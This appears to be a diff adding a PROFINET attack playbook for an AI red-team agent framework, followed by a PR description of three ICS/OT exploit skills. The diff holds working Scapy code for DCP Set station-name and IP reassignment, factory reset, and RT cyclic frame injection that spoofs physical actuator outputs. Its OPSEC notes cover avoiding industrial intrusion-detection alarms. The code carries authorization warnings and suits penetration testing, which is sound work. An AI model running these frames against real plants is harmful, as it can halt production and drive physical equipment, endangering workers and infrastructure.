+# sendp(frame, iface=IFACE, verbose=False)
+# capture response with sniff(iface=IFACE, filter=f"ether src aa:bb:cc:dd:ee:ff ...", timeout=2)
+```
+
+## Phase 3 — Flash-LED (physical device location)
+
+DCP Set with `Suboption=Signal` causes a device to blink its front-panel LED for ~3 seconds — useful for physically locating a specific device on a production floor. Read-safe; does not disrupt the process.
+
+```python
+def build_dcp_flash_led(dst_mac, xid=10):
+    """DCP Set Signal — blink device LED (physical locate)."""
+    frame_id = struct.pack(">H", 0xFEFD)
+    # Block: Option=0x05 (Control), Suboption=0x03 (Signal)
+    # BlockQualifier=0x0000, SignalValue=0x0100 (blink)
+    dcp_block = struct.pack(">BBHHh", 0x05, 0x03, 0x0004, 0x0000, 0x0100)
+    dcp_data_len = len(dcp_block)
+    dcp_header = struct.pack(">BBHHHH",
+        0x04,  # ServiceID: Set
+        0x00,  # ServiceType: Request
+        xid,
+        0x0000,
+        0x0000,
+        dcp_data_len,
+    )
+    payload = frame_id + dcp_header + dcp_block
+    return Ether(dst=dst_mac, src="00:11:22:33:44:55", type=PROFINET_ETHERTYPE) / payload
+
+# sendp(build_dcp_flash_led("aa:bb:cc:dd:ee:ff"), iface=IFACE)
+```
+
+## Phase 4 — DCP Set attacks (SAFETY GATE — write-class authorization required)
+
+> **STOP. All DCP Set operations below are write-class and require explicit scope authorization.**
+> Station-name change and IP change immediately disrupt process communication.
+
+### Station-name reassignment (process disruption)
+
+When a PROFINET IO-device's station name is changed, the IO-controller can no longer address it — the channel goes to `BF` (Bus Fault). The IO-controller will either go into safe state or continue with last values per watchdog config. This is a process-disruption attack.
+
+```python
+def build_dcp_set_station_name(dst_mac, new_name, xid=20):
+    """
+    DCP Set NameOfStation.
+    Option=0x01, Suboption=0x01 (NameOfStation).
+    new_name: bytes (PROFINET station names are ASCII, lowercase, max 240 chars)
+    """
+    name_bytes = new_name.encode("ascii").lower()
+    # Pad to even length
+    if len(name_bytes) % 2:
+        name_bytes += b"\x00"
+    block_len = len(name_bytes)
+    # Block: Option, Suboption, DCPBlockLength, BlockQualifier, Name
+    dcp_block = struct.pack(">BBH", 0x01, 0x01, block_len + 2) + struct.pack(">H", 0x0001) + name_bytes
+    total_len = len(dcp_block)
+    dcp_header = struct.pack(">BBHHHH", 0x04, 0x00, xid, 0x0000, 0x0000, total_len)
+    frame_id = struct.pack(">H", 0xFEFD)
+    payload = frame_id + dcp_header + dcp_block
+    return Ether(dst=dst_mac, src="00:11:22:33:44:55", type=PROFINET_ETHERTYPE) / payload
+
+# AUTHORIZED TESTING ONLY:
+# sendp(build_dcp_set_station_name("aa:bb:cc:dd:ee:ff", "attacker-device"), iface=IFACE)
+# After this, the original controller can no longer find "original-station-name"
+# The device enters BF state and may stop responding to IO controller.
+```
+
+### IP address reassignment
+
+```python
+import ipaddress
+
+def build_dcp_set_ip(dst_mac, new_ip, new_subnet, new_gateway, xid=21):
+    """
+    DCP Set IPSuite.
+    Option=0x01, Suboption=0x02.
+    """
+    ip_int  = int(ipaddress.IPv4Address(new_ip))
+    sub_int = int(ipaddress.IPv4Address(new_subnet))
+    gw_int  = int(ipaddress.IPv4Address(new_gateway))
+    dcp_block = struct.pack(">BBH", 0x01, 0x02, 14) + \
+                struct.pack(">H", 0x0001) + \
+                struct.pack(">III", ip_int, sub_int, gw_int)
+    total_len = len(dcp_block)
+    frame_id = struct.pack(">H", 0xFEFD)
+    dcp_header = struct.pack(">BBHHHH", 0x04, 0x00, xid, 0x0000, 0x0000, total_len)
+    payload = frame_id + dcp_header + dcp_block
+    return Ether(dst=dst_mac, src="00:11:22:33:44:55", type=PROFINET_ETHERTYPE) / payload
+
+# AUTHORIZED TESTING ONLY:
+# sendp(build_dcp_set_ip("aa:bb:cc:dd:ee:ff", "192.168.1.99", "255.255.255.0", "192.168.1.1"), iface=IFACE)
+```
+
+### Factory reset
+
+Factory reset erases station name and IP — the device reverts to DHCP or link-local addressing and requires re-commissioning from an engineering workstation. Highly disruptive in production.
+
+```python
+def build_dcp_factory_reset(dst_mac, xid=30):
+    """
+    DCP Set Control/FactoryReset.
+    Option=0x05, Suboption=0x04.
+    """
+    dcp_block = struct.pack(">BBH", 0x05, 0x04, 0x0002) + struct.pack(">H", 0x0000)
+    total_len = len(dcp_block)
+    frame_id = struct.pack(">H", 0xFEFD)
+    dcp_header = struct.pack(">BBHHHH", 0x04, 0x00, xid, 0x0000, 0x0000, total_len)
+    payload = frame_id + dcp_header + dcp_block
+    return Ether(dst=dst_mac, src="00:11:22:33:44:55", type=PROFINET_ETHERTYPE) / payload
+
+# AUTHORIZED TESTING ONLY — extremely disruptive:
+# sendp(build_dcp_factory_reset("aa:bb:cc:dd:ee:ff"), iface=IFACE)
+```
+
+## Phase 5 — PROFINET RT frame injection / cyclic IO spoofing
+
+PROFINET RT cyclic IO frames (FrameID 0x8000-0xBFFF) carry real-time process data between IO-controller and IO-devices at 1–128 ms intervals. There is no authentication or integrity protection on RT frames. An attacker on the segment can inject or replay spoofed IO data frames.
+
+```bash
+# Capture baseline cyclic IO traffic for a device pair
+sudo tcpdump -i eth0 -w /tmp/profinet_rt.pcap ether proto 0x8892 and ether host aa:bb:cc:dd:ee:ff
+# Open in Wireshark, filter: pn_rt.frame_id >= 0x8000 and pn_rt.frame_id <= 0xBFFF
+# Identify FrameID, CycleCounter pattern, DataLen for the target device
+```
+
+```python
+from scapy.all import Ether, sendp
+import struct, time
+
+def inject_profinet_rt(dst_mac, src_mac, frame_id, cycle_counter, io_data, iface="eth0"):
+    """
+    Inject a PROFINET RT cyclic data frame.
+    frame_id: FrameID for the target device (from captured traffic, 0x8000-0xBFFF)
+    cycle_counter: Increment to match expected sequence (replay detection hint)
+    io_data: bytes — the cyclic process data payload (output values for the IO-device)
+    """
+    # PROFINET RT: FrameID (2B) + Data + CycleCounter (2B) + DataStatus (1B) + TransferStatus (1B)
+    rt_header = struct.pack(">H", frame_id)
+    rt_footer = struct.pack(">HBB", cycle_counter, 0x35, 0x00)
+    # DataStatus 0x35 = valid + running + no problem
+    payload = rt_header + io_data + rt_footer
+    frame = Ether(dst=dst_mac, src=src_mac, type=0x8892) / payload
+    sendp(frame, iface=iface, verbose=False)
+
+# Example: inject zeroed output data (all outputs off) — AUTHORIZED TESTING ONLY
+# io_data = b"\x00" * 4  # size must match actual IO module output size
+# inject_profinet_rt("aa:bb:cc:dd:ee:ff", "00:11:22:33:44:55", 0x8001, 1234, io_data)
+```
+
+> Frame injection against a live IO-device causes it to accept the injected output values for that cycle. In the absence of authentication, the device cannot distinguish legitimate controller frames from injected ones. Effect: output modules (digital/analog outputs) actuate per the injected data.
+
+## Common findings
+
+| Finding | MITRE | Impact |
+|---|---|---|
+| DCP Identify-All reveals all device identities unauthenticated | T0846 | Full OT asset inventory leak; reveals vendor/firmware/station names |
+| DCP Set — station name reassignment accepted | T0816 | Process disruption: IO controller loses device, production halt |
+| DCP Set — factory reset accepted | T0816 | Device re-commissioning required; extended downtime |
+| PROFINET RT — no frame authentication | T0836 | Cyclic IO data spoofing; physical actuator manipulation |
+| Flat IT/OT L2 (office and OT on same VLAN) | T0814 | Attacker can reach PROFINET segment from corporate LAN |
+| Siemens S7 + PROFINET co-located (common) | T0842 | Chain DCP enumeration → S7Comm exploitation (cross-ref s7comm skill) |
+
+## Evidence
+
+```python
+kg_add_node(
+    kind="finding",
+    label="PROFINET DCP unauthenticated device enumeration",
+    props={
+        "key": f"profinet-dcp::{iface}",
+        "protocol": "profinet-dcp",
+        "ethertype": "0x8892",
+        "devices_found": device_count,
+        "station_names": station_names_list,  # list of discovered names
+        "dcp_set_accepted": False,  # set True only after confirmed write-scope test
+        "source": "scapy-dcp-identify-all",
+        "l2_segment": iface,
+    },
+)
+```
+
+## ZFP (two-method evidence)
+
+1. Wireshark capture (`.pcap`) containing DCP Identify responses, showing at least one device with decoded `NameOfStation`, `IPSuite`, and `VendorID` blocks.
+2. Parsed output table showing MAC → station-name → IP → device-type → firmware for each discovered device.
+
+If write testing was authorized: include DCP Set response frame showing `BlockError=0x00` (Set accepted) and a follow-up DCP Get confirming the new station name or IP.
+
+## OPSEC notes
+
+- DCP Identify-All generates a broadcast storm on large PROFINET segments — each device responds individually within a random delay (0–3s). On segments with 100+ devices, the burst may be visible in switch port statistics.
+- DCP Get (unicast) is nearly silent. Prefer unicast Gets after initial identify for lower noise.
+- Siemens Sinema Remote Connect and Scalance switches can log DCP traffic and alert on unexpected Set commands. Industrial NIDS (Claroty, Nozomi, Dragos) signature-detect DCP Set events.
+- Name/IP reassignment takes effect immediately. There is no "preview" or rollback — if you change a station name in production, you must know the original name to restore it via DCP Set.
+- PROFINET RT injection requires matching the CycleCounter and DataLength of the legitimate controller to avoid triggering `DataStatus` watchdog alarms on the IO-device.
+- Always record original station names and IPs before any DCP Set — document them in evidence for restoration.
+- Cross-reference `s7comm` skill: Siemens PLCs typically run both S7Comm (TCP 102) and PROFINET on the same device. DCP gives you identity and disruption primitives; S7Comm gives you program-level read/write.
+
+## References
+
+- PROFINET Specification (IEC 61158-5-10, IEC 61784-2) — profibus.com/technology/profinet/
+- Wireshark `pn_dcp` and `pn_rt` dissectors — Wireshark PROFINET protocol documentation
+- Siemens Security Bulletins (SSA-*) — cert.siemens.com
+- ICS-CERT PROFINET advisories — cisa.gov/uscert/ics/advisories
+- "Hacking PROFINET" — Alexander Bolshev, Black Hat 2013
+- Scapy Layer 2 documentation — scapy.readthedocs.io
+- python-profinet library — github.com/wandel/python-profinet
+- Claroty PROFINET research briefs — claroty.com/research


### PR DESCRIPTION
## Summary

Adds three new leaf skill playbooks under `packages/decepticon/decepticon/skills/standard/exploit/ics-ot/` to fill the sub-skill gaps explicitly documented in the routing table of `ics-ot/SKILL.md` (all three had '(use enumeration)' with no sub-skill on disk).

## New SKILL.md playbooks

### `standard/exploit/ics-ot/opcua/SKILL.md`
**Gap filled:** `ics-ot/SKILL.md` routing table lists `OPC UA | TCP 4840 | (use enumeration)` with no sub-skill. OPC-UA is the modern IT/OT convergence protocol replacing legacy fieldbus in DMZ environments and was completely absent.

**Content:** GetEndpoints unauthenticated SecurityPolicy enumeration, anonymous connect, username/password dictionary attack via `asyncua`, full address-space browse+read, `HistoryRead` historian exfiltration, Method node enumeration and call (write-class, safety-gated), session-exhaustion DoS with CVE references (CVE-2024-53429 open62541, CVE-2025-7390 Softing). MITRE: T0855, T0846, T0814, T0882.

### `standard/exploit/ics-ot/enip-cip/SKILL.md`
**Gap filled:** `ics-ot/SKILL.md` routing table lists `EtherNet/IP + CIP | TCP 44818, UDP 2222 | (use enumeration; CVE-driven exploits)` with tool names (`pylogix`, `cpppo`) but no playbook. EtherNet/IP is the dominant North-American ICS protocol (Allen-Bradley/Rockwell) and the clearest single gap in the ICS sub-skill set.

**Content:** UDP 2222 List Identity broadcast fingerprinting, `pylogix` controller-tag and program-tag database dump (unauthenticated on ControlLogix/CompactLogix), tag read, tag write (safety-gated), CIP mode-change Stop/Run via `cpppo`, and a CVE table covering the Rockwell auth-bypass family (CVE-2023-3595/3596 LogiSploit unauthenticated firmware r/w, CVE-2024-6242 Trusted Slot bypass). MITRE: T0855, T0836, T0816, T0814.

### `standard/exploit/ics-ot/profinet/SKILL.md`
**Gap filled:** `ics-ot/SKILL.md` routing table lists `PROFINET RT | UDP 34962-34964 | (use enumeration)` with no sub-skill. PROFINET is the Siemens/EU fieldbus peer of S7Comm (which has a sub-skill) and is heavily deployed in EU manufacturing — directly relevant to Decepticon's NATO DIANA / EU funding posture.

**Content:** L2-only protocol position (EtherType 0x8892, requires same broadcast domain), DCP Identify-All broadcast enumeration with Scapy, DCP Get device fingerprinting, flash-LED physical location, DCP Set station-name reassignment + IP change (process disruption, safety-gated), factory-reset (safety-gated), PROFINET RT cyclic-IO frame injection/replay for output spoofing. Cross-reference to `s7comm` skill for co-located Siemens PLCs. MITRE: T0842, T0846, T0814, T0816.

## Verification

- `ruff check .` — all checks passed (no Python files added)
- `ruff format --check .` — 398 files already formatted
- `pytest test_skills_registry.py test_skills_path.py -q` — 33 passed, 0 failed
- All three SKILL.md files begin with valid `---` frontmatter containing required keys: `name`, `description`, `allowed-tools`, `metadata.subdomain`, `metadata.when_to_use`, `metadata.tags`, `metadata.mitre_attack`

## Change type

Additive markdown skills only — no Python source changes.